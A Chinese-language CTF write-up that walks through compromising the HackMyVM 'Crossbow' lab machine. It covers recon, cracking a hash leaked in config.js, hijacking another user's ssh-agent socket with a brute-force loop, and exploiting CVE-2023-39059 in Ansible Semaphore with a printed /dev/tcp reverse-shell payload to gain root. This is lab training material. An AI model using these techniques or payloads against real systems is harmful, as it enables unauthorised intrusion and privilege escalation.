HackMyVM-Crossbow靶机详解WP

信息收集

服务探测

开了三个端口，发现有个9090端口

❯ ip=192.168.56.116
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.116:22
Open 192.168.56.116:80
Open 192.168.56.116:9090
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-15 16:19 CST
Initiating Ping Scan at 16:19
Scanning 192.168.56.116 [4 ports]
Completed Ping Scan at 16:19, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:19
Completed Parallel DNS resolution of 1 host. at 16:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:19
Scanning 192.168.56.116 [3 ports]
Discovered open port 22/tcp on 192.168.56.116
Discovered open port 80/tcp on 192.168.56.116
Discovered open port 9090/tcp on 192.168.56.116
Completed SYN Stealth Scan at 16:19, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.56.116
Host is up, received reset ttl 63 (0.0011s latency).
Scanned at 2024-12-15 16:19:46 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 62
9090/tcp open  zeus-admin syn-ack ttl 62

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 7 (284B) | Rcvd: 4 (172B)

80端口没有什么有价值的信息，就一个有关用户polo，我尝试扫一下目录

好像是除了index就没有其他页面了，我换了个字典扫的太慢就不扫了

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x html,zip,htm,txt,php  -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.116
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip,htm
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 5205]
/index.html           (Status: 200) [Size: 5205]
Progress: 28404 / 28410 (99.98%)
===============================================================
Finished
===============================================================

转头看看9090端口，发现有个登录页面，不过不知道账户密码，在这看了下源代码，虽然有大概的功能可以看到，但是没有密码

回到之前80端口能看到请求index的时候同时也请求了config.js

里面藏有hash还有个网址，我加入了hosts，网址没啥信息，这个config的信息大概就是9090端口的密码

❯ curl phishing.crossbow.hmv
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Site Under Construction</title>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
.....................省略
</head>
<body>
    <div class="container">
        <h1>Under Construction</h1>
        <p>We're working hard to improve our website and we'll be back soon!</p>
    </div>
</body>
</html>

我们得到hash为49ef6b765d39f06ad6a20bc951308393还有就是processd处理过程就是加密算法是SnefruTools V1

可以在google上找到对应的在线解密网站snefru hash decoder and calculator

得到密码ELzkRudzaNXRyNuN6

猜测这个9090端口的用户就是polo和这个密码，尝试登入下

用户提权

里面有个终端，进去直接就是polo用户

用nc反弹个shell到kali

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.116] 48346
uid=1001(polo) gid=1001(polo) groups=1001(polo)
/usr/bin/script -qc /bin/bash 2>/dev/null
polo@crossbow:~$
polo@crossbow:~$ cd ..
polo@crossbow:/home$ ls
lea  polo

发现有另一个额外的用户lea

不过这个polo用户没有什么权限，我在切到根目录的时候发现这个shell现在处于dokcer环境里面

有个.dockerenv的隐藏文件

然后我查看ip地址的时候也不是我virtualbox的ip，倒是像个docker的桥接ip

polo@crossbow:/$ ls -al
total 80
drwxr-xr-x   1 root root 4096 Dec 14  2023 .
drwxr-xr-x   1 root root 4096 Dec 14  2023 ..
-rwxr-xr-x   1 root root    0 Sep 15  2023 .dockerenv
lrwxrwxrwx   1 root root    7 Aug 14  2023 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Jul 14  2023 boot
drwxr-xr-x   5 root root  340 Dec 15 08:16 dev
drwxr-xr-x   1 root root 4096 Dec 14  2023 etc
drwxr-xr-x   1 root root 4096 Sep 18  2023 home
lrwxrwxrwx   1 root root    7 Aug 14  2023 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Aug 14  2023 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Aug 14  2023 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Aug 14  2023 libx32 -> usr/libx32
-rw-r--r--   1 root root    0 Dec 14  2023 lol
drwxr-xr-x   2 root root 4096 Aug 14  2023 media
drwxr-xr-x   2 root root 4096 Aug 14  2023 mnt
drwxr-xr-x   2 root root 4096 Aug 14  2023 opt
dr-xr-xr-x 162 root root    0 Dec 15 08:16 proc
drwx------   1 root root 4096 Sep 16  2023 root
drwxr-xr-x   1 root root 4096 Dec 15 08:16 run
lrwxrwxrwx   1 root root    8 Aug 14  2023 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 Aug 14  2023 srv
dr-xr-xr-x  13 root root    0 Dec 15 08:16 sys
drwxrwxrwt   4 root root 4096 Dec 15 08:58 tmp
drwxr-xr-x   1 root root 4096 Aug 14  2023 usr
drwxr-xr-x   1 root root 4096 Sep  3  2023 var
polo@crossbow:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

同时我传了个linpeas上去，枚举发现这个用户是存在docker中的

当我切到/tmp目录下发现了有趣的文件，

polo@crossbow:/tmp$ ls -al
total 16
drwxrwxrwt 4 root root 4096 Dec 15 09:17 .
drwxr-xr-x 1 root root 4096 Dec 14  2023 ..
srwxrwxrwx 1 polo polo    0 Dec 15 08:52 dbus-o6gpC36Ov1
drwx------ 2 polo polo 4096 Dec 15 08:52 ssh-XXXXXXFJyjV2
drwx------ 2 lea  lea  4096 Dec 15 08:16 ssh-XXXXXXbE0VxJ

有个两个文件的所有者分别是polo还有一个是lea

我看一下运行的进程，发现lea正在运行/home/lea/.local/agent

ssh-agent是个什么东西，查询一番得知，可以类比为ssh私钥管理者

lea           12  4.7  0.1   4564  3352 ?        S    08:16   2:46 /bin/bash /home/lea/.local/agent
lea       719522  0.0  0.0   4564   576 ?        R    09:14   0:00  _ /bin/bash /home/lea/.local/agent
root          27  0.0  0.1   3976  2016 ?        Ss   08:16   0:00 /usr/sbin/cron
lea         1082  0.0  0.1   7792  2912 ?        Ss   08:16   0:00 ssh-agent
polo      450045  0.0  0.0   7660   776 ?        Ss   08:52   0:00 /usr/bin/ssh-agent

我们使用ssh-agent，会自动导入环境变量，然后再打印输出pid进程ID

这个环境变量正好指向了/tmp目录下的新生成的文件

正常启动是eval "$(ssh-agent -s)"

这样只会打印输出pid

同时你可以发现agent.830207这个文件和你ssh-agent生成的pid相近但不完全相同，好像每次都相差2

polo@crossbow:/tmp$ ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXApBNia/agent.830207; export SSH_AUTH_SOCK;
SSH_AGENT_PID=830209; export SSH_AGENT_PID;
echo Agent pid 830209;
polo@crossbow:/tmp$ ls -al
total 20
drwxrwxrwt 5 root root 4096 Dec 15 09:22 .
drwxr-xr-x 1 root root 4096 Dec 14  2023 ..
srwxrwxrwx 1 polo polo    0 Dec 15 08:52 dbus-o6gpC36Ov1
drwx------ 2 polo polo 4096 Dec 15 09:22 ssh-XXXXXXApBNia
drwx------ 2 polo polo 4096 Dec 15 08:52 ssh-XXXXXXFJyjV2
drwx------ 2 lea  lea  4096 Dec 15 08:16 ssh-XXXXXXbE0VxJ
polo@crossbow:/tmp$ cd  ssh-XXXXXXApBNia     
polo@crossbow:/tmp/ssh-XXXXXXApBNia$ ls
agent.830207

可以在Hacktricks上找到ssh-agent的相关利用

SSH 转发代理利用 | HackTricks — SSH Forward Agent exploitation | HackTricks

我们可以利用这个ssh代理连接lea用户，不过lea用户的那个文件夹没权限读取查看里面的agent.xxxxx

ssh-agent的工作是依赖于环境变量SSH_AUTH_SOCK和SSH_AGENT_PID的，不同用户，不同终端，只要没有和这两个环境变量配对的ssh-agent，这个agent进程就不可使用。要想使用某个agent，就必须在自己的shell中先设置好这两个环境变量。

写个脚本爆破1082附近的数字来进行猜测lea用户的ssh-XXXXXXbE0VxJ下面的agent.xxxx

polo@crossbow:/tmp$ for i in {1082..1090};do SSH_AUTH_SOCK=/tmp/ssh-XXXXXXbE0VxJ/agent.$i ssh [email protected];done
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).

[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
......................省略

这个用户登入不上，我怀疑还有其他用户，在9090端口发现还有一个pedro用户

尝试利用这个用户进行登入，一直按回车即可

polo@crossbow:/tmp$ for i in {1060..1110};do SSH_AUTH_SOCK=/tmp/ssh-XXXXXXbE0VxJ/agent.$i ssh [email protected];done
--------------省略----------------
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
[email protected]: Permission denied (publickey,password).
Last login: Fri Dec 15 18:56:12 2023 from 172.17.0.2
╭─pedro@crossbow ~
╰─$ ls
user.txt
╭─pedro@crossbow ~
╰─$ cat user.txt
58cb1e1bdb3a348ddda53f22ee7c1613
╭─pedro@crossbow ~
╰─$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

没什么可以利用的，看了一下网络连接

有两个端口只对本地开放3306、3000

╭─pedro@crossbow ~
╰─$ ss -lutnp
Netid  State   Recv-Q  Send-Q   Local Address:Port   Peer Address:Port Process
udp    UNCONN  0       0              0.0.0.0:68          0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22          0.0.0.0:*
tcp    LISTEN  0       4096           0.0.0.0:80          0.0.0.0:*
tcp    LISTEN  0       80           127.0.0.1:3306        0.0.0.0:*
tcp    LISTEN  0       4096         127.0.0.1:3000        0.0.0.0:*
tcp    LISTEN  0       4096           0.0.0.0:9090        0.0.0.0:*
tcp    LISTEN  0       128               [::]:22             [::]:*
tcp    LISTEN  0       4096              [::]:80             [::]:*
tcp    LISTEN  0       4096              [::]:9090           [::]:*
╭─pedro@crossbow ~
╰─$ curl 127.0.0.1:3306
curl: (1) Received HTTP/0.9 when not allowed
╭─pedro@crossbow ~
╰─$ curl 127.0.0.1:3000                                                     1 ↵
<!DOCTYPE html>
<html lang="en">
  <head>
    <base href="/">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,initial-scale=1.0">
    <link rel="icon" href="favicon.png">
    <title>Ansible Semaphore</title>
  <script defer type="module" src="js/chunk-vendors.66355ca7.js"></script><script defer type="module" src="js/app.b2fc4bb2.js"></script><link href="css/chunk-vendors.e1031f37.css" rel="stylesheet"><link href="css/app.13f6f466.css" rel="stylesheet"><script defer src="js/chunk-vendors-legacy.b392e67e.js" nomodule></script><script defer src="js/app-legacy.cefb5b9b.js" nomodule></script></head>
  <body>
    <noscript>
      <strong>
          We're sorry but web doesn't work properly
          without JavaScript enabled. Please enable it to continue.
      </strong>
    </noscript>
    <div id="app"></div>
    <!-- built files will be auto injected -->
  </body>
</html>

观察到title为Ansible Semaphore

搜一下，发现是个基于网页的开源的自动化工具

我们可以在官方文档上找到相关的CLI命令

╭─pedro@crossbow ~
╰─$ semaphore version
v2.8.90

Root提权

我们尝试进行端口转发，靶机还就正好有装socat

将本地的3000转发到3001

╭─pedro@crossbow ~
╰─$ which socat                                                             1 ↵
/usr/bin/socat
╭─pedro@crossbow ~
╰─$ socat TCP4-LISTEN:3001,fork TCP4:localhost:3000 &
[1] 1881135

又是一个登入页面，当我尝试使用弱密码登入，结果就进去了

账户密码都是admin

找到一个cve漏洞，CVE-2023-39059

–extra-vars 参数可以被恶意用户用低权限滥用，从而实现远程命令执行（RCE）并读取文件和配置，执行服务器端请求伪造（SSRF），执行命令，并在 ansible 服务器上建立反向 shell。

Payload:{"ansible_user": "{{ lookup('ansible.builtin.pipe', \"bash -c 'exec bash -i &>/dev/tcp/127.0.0.1/1337 <&1'\") }}"}

好像是可以执行命令

不新建task了，尝试直接在原有的clean logs上修改

修改一下cleanlogs的env下的extra variables

不过报错了，但是网上一般都有解决方案

只需要在Environment variables中加入 "LC_ALL":"C.UTF-8"这一json数据即可

run一下就可以拿到反弹的shell了

┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 1234
listening on [any] 1234 ...
id
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.116] 45144
bash: impossible de régler le groupe de processus du terminal (637): Ioctl() inapproprié pour un périphérique
bash: pas de contrôle de tâche dans ce shell
root@crossbow:/root# id
uid=0(root) gid=0(root) groupes=0(root)
root@crossbow:/root# ls
clean.yml
config.json
root.txt
root@crossbow:/root# cat root.txt
7a299c41b1daac46d5ab98745b212e09

或者你可以根据官方文档新建一个Playbook的yml文件，这样可以随心所欲的修改文件内容权限之类的